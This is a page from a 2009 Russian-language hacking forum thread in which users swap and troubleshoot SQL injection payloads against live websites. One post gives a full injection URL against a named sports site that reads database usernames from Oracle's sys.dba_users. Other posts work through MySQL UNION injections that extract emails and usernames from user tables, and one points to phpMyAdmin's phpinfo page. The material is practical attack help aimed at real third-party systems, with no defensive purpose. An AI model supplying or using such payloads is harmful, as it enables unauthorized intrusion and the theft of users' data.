HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 475 из 2422 « Первая < 375425465 471 472 473 474 475 476 477 478 479 4855255759751475 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.01.2009, 22:10
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
По умолчанию
Код:
http://www.sportscn.com/program/vote/vote_result.php?voteid=1062+union+select+to_char(username)+from+sys.dba_users--
Если не работает с первого раза, нажимайте ctrl+r.
 
Ответить с цитированием

  #2  
Старый 19.01.2009, 22:14
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
Цитата:
Сообщение от R1dex  
Код:
http://www.sportscn.com/program/vote/vote_result.php?voteid=1062+union+select+to_char(username)+from+sys.dba_users--
Если не работает с первого раза, нажимайте ctrl+r.
Да жесть А объяснить сможешь, почему когда хочет тогда работает ?
 
Ответить с цитированием

  #3  
Старый 19.01.2009, 22:17
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
По умолчанию
Цитата:
Сообщение от jokester  
Да жесть А объяснить сможешь, почему когда хочет тогда работает ?
Хацкеры интернет поломали ^^

А если серьезно - хз. У меня иногда и страница: "voteid=1062" с ошибкой вылезает.
 
Ответить с цитированием

  #4  
Старый 19.01.2009, 22:33
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
По умолчанию
R1dex
да ты один меня понял.. +

jokester
я же говоил обнвлять нужно все время.. скрипт видемо некоректный и передает данные с задержкой, возможно не с первого раза изза возникновения ошибок..
Последний раз редактировалось sabe; 19.01.2009 в 22:38..
 
Ответить с цитированием

  #5  
Старый 20.01.2009, 02:40
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008

Репутация: 58
По умолчанию
что за фигня?)
-1+union+select+1,2,3,4,5,6,7,version(),9 выводит версию 5
-1+union+select+1,2,3,4,5,6,7,version(),9+from+mysq l.user+--+ ругается доступа нет
с помощью SIPT узнал таблы)
все таблы делятся на с префиксом VGB и просто другие
допустим две таблицы VGB_USER и new_data
вот из new_data все выводит а при запросе -1+union+select+1,2,3,4,5,6,7,version(),9+from+VGB_ USER+--+ ничего нет
в чем проблема?)
база одна всего.
Последний раз редактировалось j0ker13; 20.01.2009 в 02:46..
 
Ответить с цитированием

  #6  
Старый 20.01.2009, 11:23
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию
Цитата:
Сообщение от j0ker13  
что за фигня?)
-1+union+select+1,2,3,4,5,6,7,version(),9 выводит версию 5
-1+union+select+1,2,3,4,5,6,7,version(),9+from+mysq l.user+--+ ругается доступа нет
с помощью SIPT узнал таблы)
все таблы делятся на с префиксом VGB и просто другие
допустим две таблицы VGB_USER и new_data
вот из new_data все выводит а при запросе -1+union+select+1,2,3,4,5,6,7,version(),9+from+VGB_ USER+--+ ничего нет
в чем проблема?)
база одна всего.
ты не можешь читать таблицы с префиксом VGB, нету прав
 
Ответить с цитированием

  #7  
Старый 20.01.2009, 05:19
kolpeex
Новичок
Регистрация: 17.02.2008
Сообщений: 26
Провел на форуме:
68228

Репутация: 39
По умолчанию
А права есть?
 
Ответить с цитированием

  #8  
Старый 20.01.2009, 10:03
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682

Репутация: 30
По умолчанию
Вопрос:
А через phpmyadmin можно посмотреть phpinfo?
 
Ответить с цитированием

  #9  
Старый 20.01.2009, 15:25
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
По умолчанию
Цитата:
Сообщение от Octave_Parango  
Вопрос:
А через phpmyadmin можно посмотреть phpinfo?
/phpmyadmin/phpinfo.php, но вывод информации может быть запрещен
 
Ответить с цитированием

  #10  
Старый 20.01.2009, 11:16
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008

Репутация: 58
По умолчанию
2kolpeex к таблице от этого сайта нет доступа?) эт как?)) ошибок не выводит просто нет результата...
даже при таком запросе
=12+and+1=2+union+select+1,2,3,4,5,6,7,concat_ws(0 x3a,VGB_USER.EMAIL,poll_user.username),9+from+VGB_ USER,poll_user+--+
нет результата
Последний раз редактировалось j0ker13; 20.01.2009 в 11:30..
 
Ответить с цитированием
Ответ
Страница 475 из 2422 « Первая < 375425465 471 472 473 474 475 476 477 478 479 4855255759751475 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.